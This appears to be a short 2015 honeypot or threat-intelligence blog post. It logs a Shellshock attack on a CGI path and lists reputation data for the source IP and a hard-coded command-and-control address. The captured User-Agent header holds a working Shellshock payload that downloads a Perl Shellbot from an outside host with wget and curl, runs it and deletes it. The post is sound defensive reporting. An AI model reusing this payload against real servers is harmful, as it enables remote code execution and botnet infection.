Montag, 12. Oktober 2015

221.3.153.172 - perl Trojan via Shellshock - CC 69.89.2.153

BEGIN OF HTTP DATA:
2015-10-12 16:49:05
Source IP: 221.3.153.172
Country: CN RiskScore: 1 Malware: []
GET /cgi-mod/index.cgi HTTP/1.1
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://somere.ru/license.txt -O /tmp/license.txt;curl -O /tmp/license.txt http://somere.ru/license.txt;perl /tmp/license.txt ; rm -rf license.txt;rm -fr license.*");'
Host: 109.234.106.8
Connection: Close
Clamav report it as:


license.txt: Trojan.Perl.Shellbot-2 FOUND

221.3.153[.]172

    Static Source: GeoIP data
  • Country: China
  • ASN: AS4837 CNCGROUP China169 Backbone
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/221.3.153.172
    Static Source: panwdbl.appspot.com
  • Comment: Listed in open blacklist
  • Reference: https://panwdbl.appspot.com/lists/openbl.txt


 The hardcoded C&C address is

69.89.2[.]153

    Static Source: GeoIP data
  • Country: United States
  • ASN: AS20141 Quality Technology Services, LLC.
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/69.89.2.153